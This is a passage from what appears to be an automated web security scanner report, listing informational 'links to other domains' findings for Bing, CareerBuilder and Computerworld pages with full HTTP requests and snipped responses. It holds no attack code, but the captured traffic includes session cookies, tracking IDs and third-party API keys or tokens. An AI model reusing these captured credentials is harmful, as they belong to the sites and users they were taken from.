</h3><a href="http://www.discoverbing.com/?form=pgbar1&amp;publ=BINGCOM&amp;crea=TEXT_MFEHPG_UserEd_BHPApr26_DiscoverBing_1x1" onmousedown="return si_T('&amp;ID=SERP,5021.1')">Let us show you</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,38.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,40.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,42.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,44.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,46.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,48.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsathome&amp;P2=&amp;P3=0&amp;P4=MSMONY&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2f%3fscope%3dweb%26mkt%3den-US%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,50.1')">Tell us what you think</a>
...[SNIP]...

19.123. http://www.bing.com/sck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=872decb0-989c-109a-9374-300bc51bdec4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:35:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89; domain=.bing.com; path=/

<iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dAB7953A0B3D04A9F997FC8B4990FFD89%3b&h=872decb0-989c-109a-9374-300bc51bdec4" height="0" width="0" frameborder="0"/>

19.124. http://www.bing.com/sck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:35:44 GMT
Connection: close
Set-Cookie: _SS=SID=BADDC820B268422C99FA89F5582D20C7; domain=.bing.com; path=/

<iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dBADDC820B268422C99FA89F5582D20C7%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4" height="0" width="0" frameborder="0"/>

19.125. http://www.bing.com/sck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:36:46 GMT
Connection: close
Set-Cookie: _SS=SID=C33D39881EA24AD198BD331F073F338D; domain=.bing.com; path=/

<iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dC33D39881EA24AD198BD331F073F338D%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4" height="0" width="0" frameborder="0"/>

19.126. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /iframe/recommendedcvupload.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/recommendedcvupload.aspx?pagever=NewMSN HTTP/1.1
Host: www.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL48
Date: Tue, 26 Apr 2011 18:40:29 GMT
Connection: close
Content-Length: 45725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Find J
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v12.51/css/intlglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v12.51/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v12.51/css/shadowedpopup.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v12.51/css/recommendedcvupload.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/jquery/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/jobseeker/ads/delayedad.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/recommendedforyou.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/emailvalidator.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/popup.js"></script>

<LINK rel="search" href="http://img.icbdr.com/images/MarketingWeb/OpenSearch/OpenSearch2.xml" type="application/opensearchdescription+xml" title="CareerBuilder"/>
</head>
...[SNIP]...
<span style="float:left;"><img src="http://img.icbdr.com/images/MSN/OrangeHand.gif"></span>
...[SNIP]...
Jobs" onclick="submitUpload(this.form['jrupload:jeEmail'].value, false, true, this.form); return false;" language="javascript" id="JRSubmit" style="float:none !important;" />
<img src="http://img.icbdr.com/images/js/widgets/btnValidate.gif" id="jrupload_validating" style="display:none;" width="146" height="23" />
</div>
...[SNIP]...
<br/>
<img src="http://img.icbdr.com/images/js/widgets/loading.gif" width="20" height="20" border="0" /> <br/>
...[SNIP]...
<a class="closeLink" href='#' onclick='hideCurrentPopup(); return false;'><img src="http://img.icbdr.com/images/JS/Widgets/close.gif" id="Img4" height="14" width="14" border="0" /></a>
...[SNIP]...
<a class=closeLink href='#' onclick='hideCurrentPopup(); return false;'><img src="http://img.icbdr.com/images/JS/Widgets/close.gif" id="Img3" height="14" width="14" border="0" /></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...
<noscript><img src = "http://cbglobal.112.2O7.net/b/ss/cbglobal/1/H.0--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

19.127. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computerworld.com
Path:   /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:00:36 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLWLQSPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=521
Expires: Tue, 26 Apr 2011 22:00:49 GMT
Date: Tue, 26 Apr 2011 21:52:08 GMT
Connection: close
Content-Length: 134301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>

           <script type="text/javascript" src="http://content.dl-rms.com/rms/mother/573/nodetag.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>
<script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.cpw.security/;kw=texasdatabreach,databreach,comptroller,texas,;cid=9216003;author=jaikumar_vijayan;tile=1;pos=topleaderboard;dcopt=ist;sz=728x90,989x125,970x98,970x268" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;kw=texasdatabreach,databreach,comptroller,texas,;cid=9216003;author=jaikumar_vijayan;tile=1;pos=topleaderboard;dcopt=ist;sz=728x90,989x125,970x98,970x268" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.cpw.security/;kw=texasdatabreach,databreach,comptroller,texas,;cid=9216003;author=jaikumar_vijayan;tile=5;pos=dogear;dcopt=ist;sz=1x1;" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;kw=texasdatabreach,databreach,comptroller,texas,;cid=9216003;author=jaikumar_vijayan;tile=5;pos=dogear;dcopt=ist;sz=1x1;" width="1" height="1" border="0" alt=""></a>
...[SNIP]...
<li><a href="http://www.cwsubscribe.com/cgi-win/cw.cgi?ADD">Subscribe</a>
...[SNIP]...
<li><a href="http://www.cwsubscribe.com/cgi-win/cw.cgi?main3">Subscriber Services</a>
...[SNIP]...
<li id="twitter">
<a href="http://twitter.com/computerworld" target="_blank">Twitter</a>
...[SNIP]...
<li id="facebook">
<a href="http://www.facebook.com/Computerworld" target="_blank">Facebook</a>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.cpw.security/;kw=texasdatabreach,databreach,comptroller,texas,;cid=9216003;author=jaikumar_vijayan;tile=3;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,989x100,970x30,970x55;" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;kw=texasdatabreach,databreach,comptroller,texas,;cid=9216003;author=jaikumar_vijayan;tile=3;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,989x100,970x30,970x55;" width="800" height="30" border="0" alt=""></a>
...[SNIP]...
<noscript>
       <a href="http://ad.doubleclick.net/jump/idge.cpw.security/;tile=15;pos=sidekick;sz=60x968;" target="_blank">
       <img src="http://ad.doubleclick.net/ad/idge.cpw.security/;tile=15;pos=sidekick;sz=60x968;" width="60" height="968" border="0" alt=""></a>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;dc_pixel_url=idgt.data.computerworld;dc_seg=120010;ord=123456789?" width="1" height="1" border="0" alt="">
</noscript>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/idge.cpw.security/;tile=8;pos=sidecar;sz=60x55" target="_blank" style="border:none"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;tile=8;pos=sidecar;sz=60x55" border="0" height="55" width="60" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://wd.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</div>

   
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach&layout=button_count&show_faces=false&width=90&action=like&font&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-left: 10px;" allowTransparency="true"></iframe>
...[SNIP]...
<i>. Follow Jaikumar on Twitter at <a target='new' href='http://twitter.com/jaivijayan'><img src='http://www.computerworld.com/common/images/site/twitter_icon.jpg' alt='Twitter' title='Twitter' border='0'/></a> <a target='new' href='http://twitter.com/jaivijayan'>@jaivijayan</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.cpw.security/;tile=9;pos=intercept;sz=420x30;" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;tile=9;pos=intercept;sz=420x30;" width="420" height="30" border="0" alt=""></a>
...[SNIP]...
</div>-->


<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach&layout=button_count&show_faces=false&width=90&action=like&font&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<!-- logo for results provider -->
                           <a href="http://www.topsy.com" target="_blank" rel="nofollow"><img src="/resources/images/twitter-new/logo_topsy_52x13.gif" alt="Topsy" />
...[SNIP]...
<div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/integrated-app-to-disk50x37.jpg" width="50" border="0" alt="Integrated Application-to-Disk Management" /></div>
...[SNIP]...
<div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ibmcwfirehose.png" width="50" border="0" alt="Deploying Cost-Effective Data Centers" /></div>
...[SNIP]...
<div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/DellCWfirehose.png" width="50" border="0" alt="Server Migration Considerations for Businesses" /></div>
...[SNIP]...
<noscript>
   <a href="http://ad.doubleclick.net/jump/idge.cpw.security/;tile=6;pos=topimu;sz=336x280,300x250,336x600;" target="_blank">
   <img src="http://ad.doubleclick.net/ad/idge.cpw.security/;tile=6;pos=topimu;sz=336x280,300x250,336x600;" width="336" border="0" alt=""></a>
...[SNIP]...
<noscript>
    <a href="http://ad.doubleclick.net/jump/idge.cpw.security/;tagtype=iframe;tile=10;pos=bottomimu;sz=336x280;" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;tagtype=iframe;tile=10;pos=bottomimu;sz=336x280;" width="336" height="280" border="0" alt=""></a>
...[SNIP]...
<noscript>
   <a href="http://ad.doubleclick.net/jump/idge.cpw.security/;pos=articlepromoright;sz=336x250;" target="_blank">
   <img src="http://ad.doubleclick.net/ad/idge.cpw.security/;pos=articlepromoright;sz=336x250;" width="336" border="0" alt=""></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.simplyhired.com/c/job-widget/js/widget.js"></script>
...[SNIP]...
<div style="padding-top:7px;">
<a style="font-size:11px;font-weight:bold;" href="http://www.simplyhired.com/">Jobs</a>
...[SNIP]...
</span> <a style="text-decoration:none font-size:13px;" href="http://www.simplyhired.com/"><span style="color: rgb(0, 159, 223); font-weight: bold;">
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/idge.cpw.security/;tagtype=iframe;tile=16;pos=bottomleaderboard;sz=728x90;" target="_blank" style="border:none"><img src="http://ad.doubleclick.net/ad/idge.cpw.security/;tagtype=iframe;tile=16;pos=bottomleaderboard;sz=728x90;" border="0" height="90" width="728" /></a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;240236779;44243109;g?http://tinyurl.com/6g243ay?SOURCE=00311160036398CTWTKRMBL9OQZ" rel="nofollow" >
Embrace "Bring Your Own" and leave employees to their own devices.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239661970;44243109;j?http://ad.doubleclick.net/clk;240109293;62534406;z?http://www.splunk.com/goto/Delivering_Operational_Intelligence?SOURCE=00310330036305CTW8M9PVDY6PE" rel="nofollow" >
Splunk translates machine data into "aha" moments for IT and the business.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;240231397;44243109;x?http://altfarm.mediaplex.com/ad/ck/17550-126322-2764-0?mpt=%c?SOURCE=00309590036205CTWMX8PFEO1MX" rel="nofollow" >
Enterprise social software transforms business. Read the white paper.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;240083115;44243109;q?http://resources.computerworld.com/show/200002515/00277940032614CTWU5QYKXJISH/?email=%%emailaddr%%??SOURCE=00309410036160CTW1PE22DZW5V" rel="nofollow" >
Learn how your business can simplify and save on disaster recovery
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239894428;44243109;p?http://tinyurl.com/5sdde9x?SOURCE=00309240036109CTW3KEUSMW6A9" rel="nofollow" >
Cisco's Unified Fabric delivers resiliency for optimal performance. Learn More
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239989089;44243109;x?http://www.theunifyingmoment.com/pan3??SOURCE=00309250036118CTWBS8ZJ26GAF" rel="nofollow" >
New guide shows you how to accelerate unified communications ROI.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955637;44243109;p?http://clk.atdmt.com/CNT/go/311868660/direct/01/??SOURCE=00309170036070CTWKPVEJHF780" rel="nofollow" >
Firewall podcast Q&As
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955639;44243109;r?http://clk.atdmt.com/CNT/go/311868609/direct/01/??SOURCE=00309170036072CTWIIVSGDWWWG" rel="nofollow" >
IPv6: Complete these 5 Steps to Prepare
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955641;44243109;k?http://clk.atdmt.com/CNT/go/311868608/direct/01/??SOURCE=00309170036074CTWIWTRE3V8L3" rel="nofollow" >
Maximizing Business Application Functionality
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955643;44243109;m?http://clk.atdmt.com/CNT/go/311868635/direct/01/??SOURCE=00309170036076CTWYSD4MBITHJ" rel="nofollow" >
Transform with Mobile Apps
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239200342;44243109;r?http://altfarm.mediaplex.com/ad/ck/15017-126243-25192-1?SOURCE=00308970036018CTWIAQ91VIXPW" rel="nofollow" >
EMC VNX unified storage tunes SQL databases 80% faster
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239709343;44243109;g?http://www.rackspace.com/managed_hosting/index.php/?CMP=MH11_ComputerWorld_Textlink_WhyRack_Q2?SOURCE=00302650035379CTW6XTO385PEC" rel="nofollow" >
Managed Hosting Services Backed by the Power of Fanatical Support
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238919851;44243109;m?http://www.cisco.com/web/solutions/video/transform_your_business_with_video.html?POSITION=3rd+party+link&COUNTRY_SITE=us&CAMPAIGN=Thought+Leadership+Phase+3&CREATIVE=text+link+1&REFERRING_SITE=ComputerWor" rel="nofollow" >
Learn how to optimize the value of business video with this informative white paper.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;237300417;44243109;t?http://www.InterSystems.com/edasoawpcworldtextlink/index.html??SOURCE=00286580033378CTW5KHEB2I5EW" rel="nofollow" >
Advancing SOA with Event-Driven Architecture. InterSystems white paper.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239203388;44243109;e?https://www.diskeeper.com/landing/diskeeper-30-day-trialware.aspx?Apid=PPS0006776&SOURCE=00286590033379CTW1P82IMTRYG" rel="nofollow" >
Just Released! Diskeeper 2011 Optimum system performance. Always. FREE 30-day trial.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238192705;44243109;d?http://ad.doubleclick.net/clk;239205872;62020016;u?&SOURCE=00286620033383CTWL90HKGW8AX" rel="nofollow" >
Discover the benefits of virtualizing your agency's applications with VMware.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238989683;44243109;w?http://clk.atdmt.com/MRT/go/254556666/direct;wi.1;hi.1/01/&SOURCE=00284670033101CTWR9C3ODS8KF" rel="nofollow" >
Meet the needs of IT and people with Windows.. Optimized Desktop
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238646939;44243109;q?http://www.enterprisecioforum.com/?utm_source=CW&utm_medium=LINK&utm_campaign=ecf?&SOURCE=00280790032627CTWO243TYLQVP" rel="nofollow" >
Connect with global CIOs now at Enterprise CIO Forum
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238643186;44243109;h?http://altfarm.mediaplex.com/ad/ck/12309-124348-25192-2?mpt=DFP%eaid?&SOURCE=00280780032626CTWW7U33FEC4X" rel="nofollow" >
Transform the way you store data and only pay as you go.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238643177;44243109;h?http://altfarm.mediaplex.com/ad/ck/12309-124348-25192-2?mpt=DFP%eaid?&SOURCE=00280780032624CTWH9H3BZ5BDN" rel="nofollow" >
Transform the way you store data and speed virtual machine deployment time by 72%
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;240236779;44243109;g?http://web.citrix.com/Dilbert/index.html?utm_source=ComputerWorld&utm_medium=Banner&utm_term=ComputerWorld%2BText&utm_content=BYO%2BText%2Bbanner&utm_campaign=BYO%2BText%2Bbanner?SOURCE=00311160036398CTW0" rel="nofollow" >
Embrace "Bring Your Own" and leave employees to their own devices.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;240360989;44243109;h?http://altfarm.mediaplex.com/ad/ck/18206-127709-25192-3?SOURCE=00310970036368CTWB9AOSZFMBK" rel="nofollow" >
Weighing Your Options: Colocation or Managed Hosting?
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;240261263;44243109;s?http://altfarm.mediaplex.com/ad/ck/17550-126322-2764-0?mpt=%c?SOURCE=00309590036206CTW50NTDH311R" rel="nofollow" >
The risks and rewards of enterprise social software. View video now.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239894428;44243109;p?http://www.cisco.com/web/solutions/data_center/UF_landingpage.html?POSITION=3rd+party+banner&COUNTRY_SITE=us&CAMPAIGN=Unified+Fabric+Ad+Campaign&CREATIVE=Unified+Fabric&REFERRING_SITE=ComputerWorld%5FText" rel="nofollow" >
Cisco's Unified Fabric delivers resiliency for optimal performance. Learn More
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;238262758;44243109;j?http://clk.atdmt.com/MRT/go/307377909/direct;wi.1;hi.1/01/??SOURCE=00309260036120CTWJ63479JI01" rel="nofollow" >
Learn how IT is empowering users with Desktop Virtualization in this on-demand roundtable.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955617;44243109;n?http://clk.atdmt.com/CNT/go/311868668/direct/01/??SOURCE=00309170036069CTWLG5T3LLLM7" rel="nofollow" >
Comparing Private Line, Frame Relay, ATM, Ethernet and IP VPNs
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955638;44243109;q?http://clk.atdmt.com/CNT/go/311890892/direct/01/??SOURCE=00309170036071CTWKUA4U1K9PF" rel="nofollow" >
Five Best Practices For Unified Communications
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955640;44243109;j?http://clk.atdmt.com/CNT/go/311868657/direct/01/??SOURCE=00309170036073CTWI7D1NU9DHR" rel="nofollow" >
Keep Your Enemies Closer: Get Proactive about Security
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239955642;44243109;l?http://clk.atdmt.com/CNT/go/311868586/direct/01/??SOURCE=00309170036075CTWOX4G5EZN01" rel="nofollow" >
Mobility Applications Before and After
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239895139;44243109;p?http://altfarm.mediaplex.com/ad/ck/16419-126863-25192-0?SOURCE=00309100036056CTW51CY8LK5MO" rel="nofollow" >
Pinpoint root cause of network issues up to 90% faster
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239496280;44243109;j?http://ad.doubleclick.net/clk;239204468;62120981;g;pc=DFP%eaid!" rel="nofollow" >
SAP In-Memory Computing helps you analyze more data faster.
</a>
...[SNIP]...
<li class="item"><a href="http://ad.doubleclick.net/clk;239421399;44243109;i?http://www.redhat.com/summit/?sc_cid=70160000000TIjVAAW&SOURCE=00289940034060CTW3O65HOMYFK" rel="nofollow" >
